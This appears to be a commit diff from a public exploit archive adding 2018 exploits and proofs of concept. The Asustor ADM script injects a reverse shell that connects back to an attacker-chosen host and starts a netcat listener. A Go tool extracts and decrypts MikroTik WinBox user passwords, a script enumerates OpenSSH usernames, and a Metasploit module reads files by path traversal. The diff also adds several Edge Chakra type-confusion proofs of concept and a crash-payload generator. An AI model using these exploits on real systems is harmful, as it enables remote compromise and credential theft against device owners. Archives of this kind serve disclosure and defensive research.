DB: 2018-08-18
10 changes to exploits/shellcodes TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC) CEWE Photoshow 6.3.4 - Denial of Service (PoC) Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl Microsoft Edge Chakra JIT - Scope Parsing Type Confusion Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion OpenSSH 2.3 < 7.4 - Username Enumeration (PoC) Mikrotik WinBox 6.42 - Credential Disclosure (golang) Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit) Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection ADM 3.1.2RHG1 - Remote Code Execution
This commit is contained in:
parent
0424dfc05b
commit
16744756bc
11 changed files with 716 additions and 2 deletions
234
exploits/hardware/webapps/45209.go
Executable file
234
exploits/hardware/webapps/45209.go
Executable file
|
@ -0,0 +1,234 @@
|
|||
/*
|
||||
|
||||
# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )
|
||||
# Author: Maxim Yefimenko ( @slider )
|
||||
# Date: 2018-08-06
|
||||
# Sotware Link: https://mikrotik.com/download
|
||||
# Vendor Page: https://www.mikrotik.com/
|
||||
# Version: 6.29 - 6.42
|
||||
# Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android ( wherever it was possible to compile.. it's golang ^_^ )
|
||||
# CVE: CVE-2018-14847
|
||||
# References:
|
||||
# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/
|
||||
# ( BasuCert ) https://github.com/BasuCert/WinboxPoC
|
||||
# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp
|
||||
# and special thanks to Dmitriy_Area51
|
||||
|
||||
*/
|
||||
|
||||
package main
|
||||
|
||||
import (
|
||||
"crypto/md5"
|
||||
"fmt"
|
||||
"net"
|
||||
"os"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
var (
|
||||
a = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
|
||||
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
|
||||
0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
|
||||
0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
|
||||
0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
|
||||
0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
|
||||
0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
|
||||
0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
|
||||
0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
|
||||
0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
|
||||
0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
|
||||
0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
|
||||
0x00, 0x00}
|
||||
|
||||
b = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
|
||||
0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
|
||||
0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
|
||||
0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
|
||||
0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
|
||||
0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
|
||||
0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
|
||||
0x00, 0x02, 0x00, 0x00, 0x00}
|
||||
|
||||
buf = make([]byte, 1024*8)
|
||||
)
|
||||
|
||||
func checkErr(err error) {
|
||||
if err != nil {
|
||||
fmt.Println("Error:" + err.Error())
|
||||
}
|
||||
}
|
||||
|
||||
func decryptPassword(user []byte, passEnc []byte) string {
|
||||
var passw []byte
|
||||
hasher := md5.New()
|
||||
hasher.Write(user)
|
||||
hasher.Write([]byte("283i4jfkai3389"))
|
||||
key := hasher.Sum(nil)
|
||||
|
||||
for i := 0; i < len(passEnc); i++ {
|
||||
passw = append(passw, passEnc[i]^key[i%len(key)])
|
||||
}
|
||||
|
||||
return string(ASCIIonly(passw))
|
||||
}
|
||||
|
||||
func ASCIIonly(s []byte) []byte {
|
||||
for i, c := range s {
|
||||
if c < 32 || c > 126 {
|
||||
return s[:i]
|
||||
}
|
||||
}
|
||||
return s
|
||||
}
|
||||
|
||||
func extractPass(buff []byte) (s []string) {
|
||||
var (
|
||||
usr []byte
|
||||
pwd []byte
|
||||
)
|
||||
|
||||
//searching for StartOfRecord
|
||||
for i := 0; i < len(buff); i++ {
|
||||
|
||||
if i+2 >= len(buff) {
|
||||
break
|
||||
}
|
||||
|
||||
if (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {
|
||||
// fmt.Printf("Probably user record at offset 0x%.5x\n", i)
|
||||
|
||||
//some bytes ahead is enable/disable flag
|
||||
i += int((buff[i+2] - 5))
|
||||
if i >= len(buff) {
|
||||
break
|
||||
}
|
||||
|
||||
//searching for StartOfRecNumber
|
||||
if i+3 >= len(buff) {
|
||||
break
|
||||
}
|
||||
|
||||
for !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {
|
||||
i++
|
||||
if i+3 >= len(buff) {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
i += 4
|
||||
if i >= len(buff) {
|
||||
break
|
||||
}
|
||||
// fmt.Printf("SORn: 0x%X\n", i)
|
||||
|
||||
// comment?
|
||||
i += 18
|
||||
if (i + 4) >= len(buff) {
|
||||
break
|
||||
}
|
||||
if (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) {
|
||||
if (i+1)+int(buff[i]) >= len(buff) {
|
||||
break
|
||||
}
|
||||
i += int(buff[i])
|
||||
} else {
|
||||
i -= 18
|
||||
}
|
||||
|
||||
//searching for StartOfPassword
|
||||
if i+4 >= len(buff) {
|
||||
break
|
||||
}
|
||||
|
||||
for !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) {
|
||||
i++
|
||||
if i+4 >= len(buff) {
|
||||
break
|
||||
}
|
||||
}
|
||||
i += 5
|
||||
if (i + 3) >= len(buff) {
|
||||
break
|
||||
}
|
||||
|
||||
if (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) {
|
||||
pwd = buf[i-1+1 : int(buf[i-1])+i-1+1]
|
||||
i += int(buff[i-1])
|
||||
}
|
||||
|
||||
//searching for StartOfUsername
|
||||
if i+3 >= len(buff) {
|
||||
break
|
||||
}
|
||||
for !((buff[i] == 0x01) && (buff[i+3] == 0x21)) {
|
||||
i++
|
||||
if i+3 >= len(buff) {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
i += 4
|
||||
if i >= len(buff) {
|
||||
break
|
||||
}
|
||||
if buff[i] != 0x00 {
|
||||
if i+int(buff[i]) >= len(buff) {
|
||||
break
|
||||
}
|
||||
|
||||
usr = ASCIIonly(buff[i+1 : int(buff[i])+i+1])
|
||||
i += int(buff[i])
|
||||
}
|
||||
|
||||
decrypted := decryptPassword(usr, pwd)
|
||||
//fmt.Printf(" --> %s\t%s\n", buff[i], decrypted)
|
||||
|
||||
if len(usr) != 0 {
|
||||
s = append(s, strings.Join([]string{string(usr), string(decrypted)}, ":"))
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
|
||||
return s
|
||||
}
|
||||
|
||||
func main() {
|
||||
|
||||
if len(os.Args) < 2 {
|
||||
fmt.Printf(" [ usage: %s 192.168.88.1\n\n", os.Args[0])
|
||||
os.Exit(0)
|
||||
}
|
||||
|
||||
conn, err := net.DialTimeout("tcp", os.Args[1]+":8291", time.Duration(3*time.Second))
|
||||
|
||||
if err != nil {
|
||||
fmt.Println(err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
defer conn.Close()
|
||||
|
||||
conn.Write(a)
|
||||
reqLen, err := conn.Read(buf)
|
||||
checkErr(err)
|
||||
if reqLen < 38 {
|
||||
panic("First packet is too small")
|
||||
}
|
||||
|
||||
b[19] = buf[38]
|
||||
|
||||
conn.Write(b)
|
||||
reqLen, err = conn.Read(buf)
|
||||
checkErr(err)
|
||||
db := buf[:reqLen]
|
||||
|
||||
s := extractPass(db)
|
||||
for i, acc := range s {
|
||||
data := strings.SplitN(acc, ":", 2)
|
||||
fmt.Printf(" [%d] %s\t%s\n", i, data[0], data[1])
|
||||
}
|
||||
}
|
95
exploits/hardware/webapps/45212.py
Executable file
95
exploits/hardware/webapps/45212.py
Executable file
|
@ -0,0 +1,95 @@
|
|||
# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
|
||||
# Author: Matthew Fulton & Kyle Lovett
|
||||
# Date: 2018-07-01
|
||||
# Vendor Homepage: https://www.asustor.com/
|
||||
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
|
||||
# Version: <= ADM 3.1.2RHG1
|
||||
# Tested on: ASUSTOR AS6202T
|
||||
# CVE : CVE-2018-11510
|
||||
# References:
|
||||
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
"""
|
||||
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
|
||||
This exploit takes advantage an unauthenticated os command injection discovered by Kyle Lovette
|
||||
if exploitation occurs successfully, a root shell is granted
|
||||
Authors: matthew fulton and Kyle Lovett
|
||||
Date: 27 May 2018
|
||||
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
|
||||
to Asustor that Asustor hasn't acknowledge nor apparenlty fixed.
|
||||
After a twitter communication Kyle was kind enough to share a few details
|
||||
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
|
||||
Vendor link: https://www.asustor.com
|
||||
|
||||
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
|
||||
exploit for an unauthenticated OS command injection vulnerability that effects
|
||||
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
|
||||
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
|
||||
starting netcat listener on port 1234
|
||||
/bin/sh: can't access tty; job control turned off
|
||||
/volume0/usr/builtin/webman/portal/apis # uname -a;id
|
||||
/bin/sh: can't access tty; job control turned off
|
||||
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
"""
|
||||
|
||||
import sys, threading, time, os, subprocess
|
||||
import urllib2
|
||||
import ssl
|
||||
import argparse
|
||||
|
||||
|
||||
class exploit(object):
|
||||
def __init__(self,interval=1):
|
||||
self.target = args.target
|
||||
self.rport = args.port
|
||||
self.lport = args.lport
|
||||
self.remote = args.remote
|
||||
self.interval = interval
|
||||
thread = threading.Thread(target=self.run, args=())
|
||||
thread.daemon = True
|
||||
thread.start()
|
||||
|
||||
def run(self):
|
||||
#ignore ssl warnings
|
||||
ctx = ssl.create_default_context()
|
||||
ctx.check_hostname = False
|
||||
ctx.verify_mode = ssl.CERT_NONE
|
||||
while True:
|
||||
try:
|
||||
turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
|
||||
"launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
|
||||
"(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
|
||||
"%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
|
||||
"subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
|
||||
response=urllib2.urlopen(turl,context=ctx)
|
||||
time.sleep(self.interval)
|
||||
except urllib2.URLError as e:
|
||||
print "Something is wrong:|"
|
||||
print e
|
||||
os._exit(1)
|
||||
|
||||
def revShell():
|
||||
print "starting netcat listener on port "+args.lport
|
||||
cmd = "nc -lv {0}".format(args.lport)
|
||||
os.system(cmd)
|
||||
|
||||
def main():
|
||||
print """exploit for an unauthenticated OS command injection vulnerability that effects
|
||||
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
|
||||
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
|
||||
goexploit = exploit()
|
||||
revShell()
|
||||
|
||||
if __name__ == '__main__':
|
||||
Help = """exploitation of a OS command injection bug that effects Asustor ADM, leads to complete compromise
|
||||
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
|
||||
parser=argparse.ArgumentParser(description=help)
|
||||
parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
|
||||
parser.add_argument('--port', '-p', default="8001")
|
||||
parser.add_argument('--lport', '-l', default="1234")
|
||||
parser.add_argument('--remote','-r', default="192.168.1.253")
|
||||
args = parser.parse_args()
|
||||
main()
|
84
exploits/linux/remote/45210.py
Executable file
84
exploits/linux/remote/45210.py
Executable file
|
@ -0,0 +1,84 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# Copyright (c) 2018 Matthew Daley
|
||||
#
|
||||
# Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
# of this software and associated documentation files (the "Software"), to
|
||||
# deal in the Software without restriction, including without limitation the
|
||||
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
|
||||
# sell copies of the Software, and to permit persons to whom the Software is
|
||||
# furnished to do so, subject to the following conditions:
|
||||
#
|
||||
# The above copyright notice and this permission notice shall be included in
|
||||
# all copies or substantial portions of the Software.
|
||||
#
|
||||
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
|
||||
# IN THE SOFTWARE.
|
||||
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import paramiko
|
||||
import socket
|
||||
import sys
|
||||
|
||||
|
||||
class InvalidUsername(Exception):
|
||||
pass
|
||||
|
||||
|
||||
def add_boolean(*args, **kwargs):
|
||||
pass
|
||||
|
||||
|
||||
old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
|
||||
paramiko.common.MSG_SERVICE_ACCEPT]
|
||||
|
||||
def service_accept(*args, **kwargs):
|
||||
paramiko.message.Message.add_boolean = add_boolean
|
||||
return old_service_accept(*args, **kwargs)
|
||||
|
||||
|
||||
def userauth_failure(*args, **kwargs):
|
||||
raise InvalidUsername()
|
||||
|
||||
|
||||
paramiko.auth_handler.AuthHandler._handler_table.update({
|
||||
paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
|
||||
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
|
||||
})
|
||||
|
||||
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
|
||||
|
||||
arg_parser = argparse.ArgumentParser()
|
||||
arg_parser.add_argument('hostname', type=str)
|
||||
arg_parser.add_argument('--port', type=int, default=22)
|
||||
arg_parser.add_argument('username', type=str)
|
||||
args = arg_parser.parse_args()
|
||||
|
||||
sock = socket.socket()
|
||||
try:
|
||||
sock.connect((args.hostname, args.port))
|
||||
except socket.error:
|
||||
print '[-] Failed to connect'
|
||||
sys.exit(1)
|
||||
|
||||
transport = paramiko.transport.Transport(sock)
|
||||
try:
|
||||
transport.start_client()
|
||||
except paramiko.ssh_exception.SSHException:
|
||||
print '[-] Failed to negotiate SSH transport'
|
||||
sys.exit(2)
|
||||
|
||||
try:
|
||||
transport.auth_publickey(args.username, paramiko.RSAKey.generate(2048))
|
||||
except InvalidUsername:
|
||||
print '[*] Invalid username'
|
||||
sys.exit(3)
|
||||
except paramiko.ssh_exception.AuthenticationException:
|
||||
print '[+] Valid username'
|
74
exploits/linux/webapps/45198.rb
Executable file
74
exploits/linux/webapps/45198.rb
Executable file
|
@ -0,0 +1,74 @@
|
|||
# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)
|
||||
# Author: Dhiraj Mishra
|
||||
# Date: 2018-08-14
|
||||
# Software: Oracle Glassfish Server OSE
|
||||
# Version: 4.1
|
||||
# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip
|
||||
# CVE: 2017-1000028
|
||||
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated directory traversal vulnerability
|
||||
which exits in administration console of Oracle GlassFish Server 4.1, which is
|
||||
listening by default on port 4848/TCP.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2017-1000028'],
|
||||
['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
|
||||
['EDB', '39441']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Trustwave SpiderLabs', # Vulnerability discovery
|
||||
'Dhiraj Mishra' # Metasploit module
|
||||
],
|
||||
'DisclosureDate' => 'Aug 08 2015',
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(4848),
|
||||
OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
|
||||
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
|
||||
])
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
filename = datastore['FILEPATH']
|
||||
traversal = "%c0%af.." * datastore['DEPTH'] << filename
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "/theme/META-INF/prototype#{traversal}"
|
||||
})
|
||||
|
||||
unless res && res.code == 200
|
||||
print_error('Nothing was downloaded')
|
||||
return
|
||||
end
|
||||
|
||||
vprint_good("#{peer} - #{res.body}")
|
||||
path = store_loot(
|
||||
'oracle.traversal',
|
||||
'text/plain',
|
||||
ip,
|
||||
res.body,
|
||||
filename
|
||||
)
|
||||
print_good("File saved in: #{path}")
|
||||
end
|
||||
end
|
31
exploits/windows/dos/45213.js
Normal file
31
exploits/windows/dos/45213.js
Normal file
|
@ -0,0 +1,31 @@
|
|||
/*
|
||||
If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag.
|
||||
|
||||
In the PoC, it redefines Map.prototype.get to intercept the execution of Intl.js.
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
function opt(arr, obj) {
|
||||
arr[0] = 1.1;
|
||||
obj.x;
|
||||
arr[0] = 2.3023e-320;
|
||||
}
|
||||
|
||||
let arr = [1.1];
|
||||
for (let i = 0; i < 0x10000; i++) {
|
||||
opt(arr, {});
|
||||
}
|
||||
|
||||
let get = Map.prototype.get;
|
||||
Map.prototype.get = function (key) {
|
||||
Map.prototype.get = get;
|
||||
|
||||
arr[0] = {};
|
||||
|
||||
return this.get(key);
|
||||
};
|
||||
|
||||
opt(arr, Intl);
|
||||
|
||||
alert(arr[0]);
|
79
exploits/windows/dos/45214.js
Normal file
79
exploits/windows/dos/45214.js
Normal file
|
@ -0,0 +1,79 @@
|
|||
// PoC:
|
||||
|
||||
async function trigger(a = class b {
|
||||
[await 1]() {
|
||||
}
|
||||
}) {
|
||||
}
|
||||
|
||||
let spray = [];
|
||||
for (let i = 0; i < 100000; i++) {
|
||||
spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
|
||||
}
|
||||
|
||||
trigger();
|
||||
|
||||
/*
|
||||
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
|
||||
|
||||
Here's the generated bytecode.
|
||||
|
||||
Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
|
||||
18 locals (8 temps from R10), 5 inline cache
|
||||
Constant Table:
|
||||
======== =====
|
||||
R1 LdRoot
|
||||
R2 LdC_A_I4 int:1
|
||||
R3 Ld_A (undefined)
|
||||
R4 LdFalse
|
||||
|
||||
Implicit Arg Ins:
|
||||
======== === ===
|
||||
R5 ArgIn_A In1
|
||||
|
||||
0000 InitUndecl R6
|
||||
0002 TryCatch x:004c ( 71)
|
||||
|
||||
|
||||
Line 1: a = class b {
|
||||
Col 24: ^
|
||||
0005 BrSrNeq_A x:0048 ( 62) R5 R3
|
||||
000a NewScFunc R13 = b()
|
||||
000d InitClass R13
|
||||
0012 ProfiledLdFld R14 = R13.prototype #0 <0>
|
||||
0016 SetHomeObj R13 R14
|
||||
001b NewScObjectSimple R9
|
||||
001d ProfiledStFld R9.value = R2 #1 <1>
|
||||
0021 ProfiledStFld R9.done = R4 #2 <2>
|
||||
0025 Yield R9 R9 <<-----------------------------------------------
|
||||
0028 ResumeYield R15 R9
|
||||
002b NewScFunc R16 = b.prototype[]()
|
||||
002e SetComputedNameVar R16 R15
|
||||
0033 ProfiledLdFld R14 = R13.prototype #0 <0>
|
||||
0037 InitClassMemberComputedName R14[R15] = R16
|
||||
003d SetHomeObj R16 R14
|
||||
0042 InitConst R6 R13
|
||||
0045 Ld_A R5 R13
|
||||
0048 Leave
|
||||
0049 Br x:0074 ( 40)
|
||||
004c Catch R10
|
||||
004e Nop
|
||||
004f ProfiledLdRootFld R11 = root.Promise #4 <4>
|
||||
0055 ProfiledLdMethodFld R12 = R11.reject #3 <3>
|
||||
0059 StartCall ArgCount: 2
|
||||
005c ArgOut_A Out0 = R11
|
||||
005f ArgOut_A Out1 = R10
|
||||
0062 ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3> <0>
|
||||
006c Ld_A R0 R12
|
||||
006f Leave
|
||||
0070 Br x:0076 ( 3)
|
||||
0073 Leave
|
||||
0074 LdUndef R0
|
||||
|
||||
|
||||
Line 5: }
|
||||
Col 1: ^
|
||||
0076 Ret
|
||||
|
||||
Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
|
||||
*/
|
38
exploits/windows/dos/45215.js
Normal file
38
exploits/windows/dos/45215.js
Normal file
|
@ -0,0 +1,38 @@
|
|||
/*
|
||||
Here's the method.
|
||||
template <typename TPropertyIndex>
|
||||
template <typename TPropertyIndexFrom>
|
||||
void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)
|
||||
{
|
||||
this->Attributes = descriptor.Attributes;
|
||||
this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;
|
||||
this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;
|
||||
this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;
|
||||
this->IsAccessor = descriptor.IsAccessor;
|
||||
|
||||
#if ENABLE_FIXED_FIELDS
|
||||
this->IsInitialized = descriptor.IsInitialized;
|
||||
this->IsFixed = descriptor.IsFixed;
|
||||
this->UsedAsFixed = descriptor.UsedAsFixed;
|
||||
#endif
|
||||
}
|
||||
|
||||
Given its name, I think that the method is supposed to copy all the fields from another descriptor to "this". But it actually leaves some fields uncopied. The "IsShadowed" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the "IsShadowed" field can lead to type confusion like in the PoC or uninitialized pointer dereference.
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
let x = 1;
|
||||
|
||||
this.x = 0x1234; // IsShadowed
|
||||
|
||||
// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.
|
||||
for (let i = 0; i < 0x10000; i++) {
|
||||
this['a' + i] = 1;
|
||||
}
|
||||
|
||||
// Set IsAccessor
|
||||
this.__defineSetter__('x', () => {});
|
||||
|
||||
// Type confusion
|
||||
this.x;
|
26
exploits/windows/dos/45216.js
Normal file
26
exploits/windows/dos/45216.js
Normal file
|
@ -0,0 +1,26 @@
|
|||
/*
|
||||
This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemI_A instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for issue 1531 .
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
function opt(arr, value) {
|
||||
arr.push(value); // <--------
|
||||
arr[0] = 2.3023e-320;
|
||||
}
|
||||
|
||||
function main() {
|
||||
for (let i = 0; i < 0x10000; i++) {
|
||||
let tmp = [1.1, 2.2, 3.3];
|
||||
delete tmp[1];
|
||||
|
||||
opt(tmp, 2.2);
|
||||
}
|
||||
|
||||
let arr = [1.1];
|
||||
opt(arr, -5.3049894784e-314); // MAGIC VALUE!
|
||||
|
||||
alert(arr);
|
||||
}
|
||||
|
||||
main();
|
18
exploits/windows/dos/45217.js
Normal file
18
exploits/windows/dos/45217.js
Normal file
|
@ -0,0 +1,18 @@
|
|||
/*
|
||||
The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for ICU don't check whether the given object has been initialized. This allows to initialize the same object multiple times which can lead to type confusion.
|
||||
|
||||
It seems the recent version of Edge in Windows Insider Preview has started to use ICU. Tested on Microsoft Edge 42.17672.1000.0 and Microsoft EdgeHTML 17.17672.
|
||||
|
||||
The initializer for ICU has no check:
|
||||
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L1151
|
||||
|
||||
The initializer for WinGlob has a check:
|
||||
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L3046
|
||||
|
||||
PoC:
|
||||
*/
|
||||
|
||||
let object = {};
|
||||
Intl.NumberFormat.apply(object);
|
||||
Intl.DateTimeFormat.apply(object);
|
||||
Intl.DateTimeFormat.prototype.formatToParts.apply(object);
|
25
exploits/windows_x86-64/dos/45211.py
Executable file
25
exploits/windows_x86-64/dos/45211.py
Executable file
|
@ -0,0 +1,25 @@
|
|||
# Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service (PoC)
|
||||
# Author: Gionathan "John" Reale
|
||||
# Discovey Date: 2018-08-17
|
||||
# Homepage: https://cewe-photoworld.com/
|
||||
# Software Link: https://cewe-photoworld.com/creator-software/windows-download
|
||||
# Tested Version: 6.3.4
|
||||
# Tested on OS: Windows 10
|
||||
# Steps to Reproduce: Run the python exploit script, it will create a new
|
||||
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
|
||||
# and start the program. Once inside of the CEWE Photoshow program click "Login". In the new window paste the content of
|
||||
# "exploit.txt" into the following fields:"email address" & "Password". Click "Ok" and you will see a crash.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 4000
|
||||
|
||||
payload = buffer
|
||||
try:
|
||||
f=open("exploit.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(payload)
|
||||
f.write(payload)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
|
@ -6046,9 +6046,15 @@ id,file,description,date,author,type,platform,port
|
|||
45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
|
||||
45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
|
||||
